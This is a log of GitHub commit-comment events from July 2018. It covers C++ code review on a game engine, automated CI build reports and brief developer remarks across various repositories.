{"id":"7938645825","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29644187,"position":null,"line":null,"path":null,"commit_id":"baf72b2a32111f01d2909219e88e7a3aa41e34ce","created_at":"2018-07-09T16:11:59Z","updated_at":"2018-07-09T16:11:59Z","author_association":"COLLABORATOR","body":"Puzzle `1088-c6f329b3` discovered in   [`pom.xml`](  https://github.com/zerocracy/farm/blob/master/pom.xml)   and submitted as #1391. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T16:11:59Z"}
{"id":"7938645866","type":"CommitCommentEvent","actor":{"login":"chrisrocco"},"repo":{"name":"chrisrocco/apartment-auto-caller"},"payload":{"comment":{"id":29644188,"position":null,"line":null,"path":null,"commit_id":"1283f3fe497f5dc2cae13dad054440019f519e48","created_at":"2018-07-09T16:11:59Z","updated_at":"2018-07-09T16:11:59Z","author_association":"OWNER","body":"I'm aware. But this is only a phone number. It can also be found on my Facebook account, so I'm not worried about it."}},"created_at":"2018-07-09T16:11:59Z"}
{"id":"7938652855","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644199,"position":12,"line":50,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:13:14Z","updated_at":"2018-07-09T16:13:14Z","author_association":"CONTRIBUTOR","body":"Bummer. Personally I don't really use an IDE. Just a text editor and my compiler :-P, but I know a large number of people rely on intellisense *shrug*."}},"created_at":"2018-07-09T16:13:14Z"}
{"id":"7938656551","type":"CommitCommentEvent","actor":{"login":"dominikvitt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29644208,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-09T16:13:54Z","updated_at":"2018-07-09T16:13:54Z","author_association":"CONTRIBUTOR","body":"Tested it before and it worked fine.\r\nBut now it looks like it's broken.\r\nDon't worry, I'm building a new export function for tsv, so there won't be any differences between lss and tsv."}},"created_at":"2018-07-09T16:13:54Z"}
{"id":"7938662455","type":"CommitCommentEvent","actor":{"login":"rochukuba"},"repo":{"name":"rochukuba/Rochuuu"},"payload":{"comment":{"id":29644223,"position":null,"line":null,"path":null,"commit_id":"4fc01499c280a0e5b391b3278ab141e34eb0acad","created_at":"2018-07-09T16:14:59Z","updated_at":"2018-07-09T16:14:59Z","author_association":"OWNER","body":"1. \r\n![clip_image002](https://user-images.githubusercontent.com/40770386/42462583-fad035fc-83a3-11e8-837b-bb28079f110c.jpg)\r\n"}},"created_at":"2018-07-09T16:14:59Z"}
{"id":"7938666353","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29644230,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T16:15:41Z","updated_at":"2018-07-09T16:15:41Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2931 of 2931 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T16:15:41Z"}
{"id":"7938673346","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644238,"position":null,"line":null,"path":null,"commit_id":"3d035a21eaa49bf4b87c11cbf1fe626204c03195","created_at":"2018-07-09T16:16:55Z","updated_at":"2018-07-09T16:16:55Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `7e81ad2e-8393-11e8-84b2-d97783c6d54c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:16:55Z"}
{"id":"7938675414","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644244,"position":null,"line":null,"path":null,"commit_id":"7341730183f02f94903cef9a867a40d7fdd761d2","created_at":"2018-07-09T16:17:18Z","updated_at":"2018-07-09T16:17:18Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `8bf9e548-8393-11e8-9765-f2c5fc358222`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:17:18Z"}
{"id":"7938678282","type":"CommitCommentEvent","actor":{"login":"janos-ss"},"repo":{"name":"SonarSource/sonarlint-intellij"},"payload":{"comment":{"id":29644253,"position":37,"line":77,"path":"src/main/java/org/sonarlint/intellij/config/global/rules/RuleConfigurationPanel.java","commit_id":"94ac32a5783871e5dbc9b11d47dbc97bfcb458e4","created_at":"2018-07-09T16:17:48Z","updated_at":"2018-07-09T16:17:48Z","author_association":"CONTRIBUTOR","body":"Can be `final`"}},"created_at":"2018-07-09T16:17:48Z"}
{"id":"7938679775","type":"CommitCommentEvent","actor":{"login":"Spirtix"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29644260,"position":null,"line":null,"path":null,"commit_id":"180f7325402d1ceb713bc0ffff890e38d965796f","created_at":"2018-07-09T16:18:07Z","updated_at":"2018-07-09T16:18:07Z","author_association":"OWNER","body":"@SpeedoWBT did you use merge defconfig?\r\nI will build from @T1mpp4 repo to have the newest upstream commits for the next ROM build."}},"created_at":"2018-07-09T16:18:07Z"}
{"id":"7938681345","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644263,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:18:24Z","updated_at":"2018-07-09T16:18:24Z","author_association":"CONTRIBUTOR","body":"Honestly I don't think that atomic reference counting is *that* expensive compared to a lot of things. It's nice to not incur an atomic op where you don't need to, but I'm not sure it's worth going out of your way by much.\r\n\r\nI can imagine that for a situation like this, you could create a custom smart pointer style class that offered a \"reserve()\" function that let you tell it how many ref-counts to increment ahead of time.\r\n\r\nThen, just before your loop, you reserve that many references. And each place you're currently copying the pointer, you instead call something like \"copy_reserved()\" which makes a pointer copy but does not increase the reference count.\r\n\r\nThen when that pre-reserved copy of the pointer's destructor is called, it decreases the refcount as normal, eventually dropping the refcount to zero and cleaning up the object.\r\n\r\nThat makes the ref-counting related work a single operation for the copies, and then the same number of operations for each destructor call."}},"created_at":"2018-07-09T16:18:24Z"}
{"id":"7938684210","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644269,"position":null,"line":null,"path":null,"commit_id":"d92beb6d23e32e9134d3da8c8f3f2b4a2754f1c0","created_at":"2018-07-09T16:18:57Z","updated_at":"2018-07-09T16:18:57Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c6e801e4-8393-11e8-8836-305a9389841c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:18:57Z"}
{"id":"7938684840","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644271,"position":49,"line":125,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.h","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:19:04Z","updated_at":"2018-07-09T16:19:04Z","author_association":"CONTRIBUTOR","body":"Sorry for the confusion here, but just to make sure, \r\n\r\nstd::atomic<UINT32> mNumRemainingTasks{mCount};\r\n\r\ndoes actually set the value properly? I didn't realize this was even allowed."}},"created_at":"2018-07-09T16:19:04Z"}
{"id":"7938686235","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644273,"position":null,"line":null,"path":null,"commit_id":"39220a680aea5cfeb9120739d63adb7de3b305d4","created_at":"2018-07-09T16:19:20Z","updated_at":"2018-07-09T16:19:20Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d489221a-8393-11e8-86a1-cef5b40ec882`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:19:20Z"}
{"id":"7938687135","type":"CommitCommentEvent","actor":{"login":"dhruvdalsaniya1995"},"repo":{"name":"dhruvdalsaniya1995/Zingat"},"payload":{"comment":{"id":29644274,"position":8,"line":8,"path":"config.txt","commit_id":"871eee9ada167a6039e1392dd646033974692e45","created_at":"2018-07-09T16:19:31Z","updated_at":"2018-07-09T16:19:31Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-09T16:19:31Z"}
{"id":"7938688896","type":"CommitCommentEvent","actor":{"login":"spwilson2"},"repo":{"name":"jenkinsci/amazon-ecs-plugin"},"payload":{"comment":{"id":29644276,"position":14,"line":232,"path":"src/main/java/com/cloudbees/jenkins/plugins/amazonecs/ECSService.java","commit_id":"1ab6a4d0e9bd465a96951ddaa200f211abd360a9","created_at":"2018-07-09T16:19:50Z","updated_at":"2018-07-09T16:19:50Z","author_association":"NONE","body":"This check always fails to match for non-fargate task definitions. \r\nhttps://issues.jenkins-ci.org/browse/JENKINS-51775"}},"created_at":"2018-07-09T16:19:50Z"}
{"id":"7938691342","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29644283,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-09T16:20:18Z","updated_at":"2018-07-09T16:20:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T16:20:18Z"}
{"id":"7938692729","type":"CommitCommentEvent","actor":{"login":"webAnatoly"},"repo":{"name":"webAnatoly/understading_redux"},"payload":{"comment":{"id":29644287,"position":null,"line":null,"path":null,"commit_id":"f27b4ba5a3ac533e354999edd8ae08bc36f7ca9e","created_at":"2018-07-09T16:20:32Z","updated_at":"2018-07-09T16:20:32Z","author_association":"OWNER","body":"Это action creator. Action creators are great for running async code when you dispatch an action.\r\n\r\n"}},"created_at":"2018-07-09T16:20:32Z"}
{"id":"7938693871","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29644288,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T16:20:45Z","updated_at":"2018-07-09T16:20:45Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-09T16:20:45Z"}
{"id":"7938695161","type":"CommitCommentEvent","actor":{"login":"MMesch"},"repo":{"name":"MMesch/IHaskell"},"payload":{"comment":{"id":29644289,"position":17,"line":270,"path":"main/Main.hs","commit_id":"c4bf5a04a4bb17f2153e181fc1fd1bddb1313f21","created_at":"2018-07-09T16:20:58Z","updated_at":"2018-07-09T16:20:58Z","author_association":"OWNER","body":"this seems to trigger that we can use the kernel in jupyterlab"}},"created_at":"2018-07-09T16:20:58Z"}
{"id":"7938697665","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644293,"position":49,"line":125,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.h","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:21:26Z","updated_at":"2018-07-09T16:21:26Z","author_association":"CONTRIBUTOR","body":"It appear to work properly although I'm not sure how is this defined in the standard. My logic was that similar behavior works fine in constructor member initializer lists, as long as you respect the order of initialization, so it should work with in-class initializers as well."}},"created_at":"2018-07-09T16:21:26Z"}
{"id":"7938697811","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644294,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T16:21:28Z","updated_at":"2018-07-09T16:21:28Z","author_association":"CONTRIBUTOR","body":"What did you have in mind for the single call?\r\n\r\nWouldn't serializing, and deserializing fundamentally need to be separate functions? I suppose rttiGetElemSize could be absorbed by the other two calls."}},"created_at":"2018-07-09T16:21:28Z"}
{"id":"7938700161","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644315,"position":49,"line":57,"path":"Source/Foundation/bsfCore/Particles/BsParticleManager.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T16:21:56Z","updated_at":"2018-07-09T16:21:56Z","author_association":"CONTRIBUTOR","body":"Makes sense."}},"created_at":"2018-07-09T16:21:56Z"}
{"id":"7938702256","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644319,"position":55,"line":1296,"path":"Source/Plugins/bsfRenderBeast/BsRenderCompositor.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T16:22:19Z","updated_at":"2018-07-09T16:22:19Z","author_association":"CONTRIBUTOR","body":"Oh. Duh. I didn't see that."}},"created_at":"2018-07-09T16:22:19Z"}
{"id":"7938706260","type":"CommitCommentEvent","actor":{"login":"mksully22"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29644326,"position":null,"line":null,"path":null,"commit_id":"f420f9b85b5f5612f58a45ab49e8aba54f6f5527","created_at":"2018-07-09T16:23:07Z","updated_at":"2018-07-09T16:23:07Z","author_association":"CONTRIBUTOR","body":"The libtoa_stubs.a library created when building testing/ocaml-dtoa contains the bignum_align.part.4 section created by the compiler optimizing the bignum_align(). This causes the reported error when building flow as it trys to link with it libtoa_stubs.a. To prevent this add the __attribute__((noinline)) to bignum_align() and rebuild the libtoa_stubs.a library. Once the testing/ocaml-dtoa libtoa_stubs.a library is rebuilt with this change the error in testing/flow that occurs during link to the libdtoa_stubs.a library should be fixed.\r\n\r\na PR for testing/ocaml-dtoa has been submitted to fix this for ppc64le:\r\nhttps://github.com/alpinelinux/aports/pull/4698\r\n\r\nOnce that PR is merged and rebuilt I will submit a follow up patch to reenable ppc64le for testing/flow"}},"created_at":"2018-07-09T16:23:07Z"}
{"id":"7938708366","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644329,"position":null,"line":null,"path":null,"commit_id":"c083fe338ec65bda5ae198c2d6ab0fc39f81a37c","created_at":"2018-07-09T16:23:31Z","updated_at":"2018-07-09T16:23:31Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `nodes_count` |       +8 |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     -828 |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4417)*\n"}},"created_at":"2018-07-09T16:23:31Z"}
{"id":"7938708746","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644331,"position":null,"line":null,"path":null,"commit_id":"abf5442c86751fdfa43d5811085ec49c57896284","created_at":"2018-07-09T16:23:36Z","updated_at":"2018-07-09T16:23:36Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6d522046-8394-11e8-88ff-6160f4dd375a`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:23:36Z"}
{"id":"7938711635","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644344,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T16:24:10Z","updated_at":"2018-07-09T16:24:10Z","author_association":"CONTRIBUTOR","body":"I don't have anything in mind, I was just thinking it would be nice to do it `somehow`. Yet to figure out how or if its even possible..."}},"created_at":"2018-07-09T16:24:10Z"}
{"id":"7938713141","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29644349,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-09T16:24:26Z","updated_at":"2018-07-09T16:24:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T16:24:26Z"}
{"id":"7938713164","type":"CommitCommentEvent","actor":{"login":"irfaan008"},"repo":{"name":"satyampatro/techub"},"payload":{"comment":{"id":29644350,"position":null,"line":null,"path":null,"commit_id":"e45696fff44811111b797a8f25e1cac555f7de08","created_at":"2018-07-09T16:24:26Z","updated_at":"2018-07-09T16:24:26Z","author_association":"NONE","body":"Please remove these keys before I take action as belongs to my account. "}},"created_at":"2018-07-09T16:24:26Z"}
{"id":"7938713350","type":"CommitCommentEvent","actor":{"login":"TearablePuns"},"repo":{"name":"TearablePuns/Countdown"},"payload":{"comment":{"id":29644351,"position":32,"line":55,"path":"src/components/app.js","commit_id":"b75e89f49c3cc25e2122169c33ffe85d3580b33d","created_at":"2018-07-09T16:24:29Z","updated_at":"2018-07-09T16:24:29Z","author_association":"OWNER","body":"This is the code for adding number endings"}},"created_at":"2018-07-09T16:24:29Z"}
{"id":"7938714274","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644354,"position":13,"line":154,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.h","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T16:24:39Z","updated_at":"2018-07-09T16:24:39Z","author_association":"CONTRIBUTOR","body":"That all sounds reasonable. I generally take the same mindset for constructors, but do like abusing std::pair a lot.\r\n\r\nPerhaps part of why I like std::pair is that it lets you do the \r\n\r\nauto [x, y] = std::pair....\r\n\r\nsyntax that I think came with c++14, though sadly I can't use that at work yet, our compiler(s) too old still."}},"created_at":"2018-07-09T16:24:39Z"}
{"id":"7938736553","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29644406,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-09T16:28:54Z","updated_at":"2018-07-09T16:28:54Z","author_association":"OWNER","body":"https://gist.github.com/Sayan98/add1bfe2aa25180529f078f9fd30e4c1"}},"created_at":"2018-07-09T16:28:54Z"}
{"id":"7938743147","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644419,"position":null,"line":null,"path":null,"commit_id":"27e57ba76584d46d801d630520426fef2b9d57cf","created_at":"2018-07-09T16:30:10Z","updated_at":"2018-07-09T16:30:10Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `584c7d9e-8395-11e8-938e-878bb530e084`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:30:10Z"}
{"id":"7938744506","type":"CommitCommentEvent","actor":{"login":"idolawoye"},"repo":{"name":"idolawoye/Treemaker"},"payload":{"comment":{"id":29644425,"position":null,"line":null,"path":null,"commit_id":"a8540f80dc5c9b8269bdd689ed97c19669aa55da","created_at":"2018-07-09T16:30:24Z","updated_at":"2018-07-09T16:30:24Z","author_association":"OWNER","body":"Updated with Maximum Likelihood feature"}},"created_at":"2018-07-09T16:30:24Z"}
{"id":"7938751375","type":"CommitCommentEvent","actor":{"login":"satmandu"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29644435,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-09T16:31:34Z","updated_at":"2018-07-09T16:31:34Z","author_association":"NONE","body":"Agreed. And the OSS firmware appears to be on near-permanent hiatus. https://github.com/christinaa/rpi-open-firmware/issues/37"}},"created_at":"2018-07-09T16:31:34Z"}
{"id":"7938755503","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644441,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T16:32:19Z","updated_at":"2018-07-09T16:32:19Z","author_association":"CONTRIBUTOR","body":"Well you could always do it with a passed in enum value, but that still ends up being about the same outcome, you're just using a switch-case instead of 3 different functions for each override.\r\n\r\nThe toughest thing is always those data types that have a dynamic size, or other specialized handling. Auto-generating the reads and writes for statically sized \"normal\" types is relatively straight forward (and I think you've already got 3 static methods that just do it for those, right?)\r\n\r\nWithout something like the reflexpr proposal, or c++ meta-classes, or any of the other more compile-time-programming oriented proposals, i'm not really sure that c++ can even *do* that without a code generator or human involved.\r\n\r\nI'll noodle on this subject a bit and see if I think of anything.\r\n\r\nI *really* enjoy template meta programming, for whatever reason."}},"created_at":"2018-07-09T16:32:19Z"}
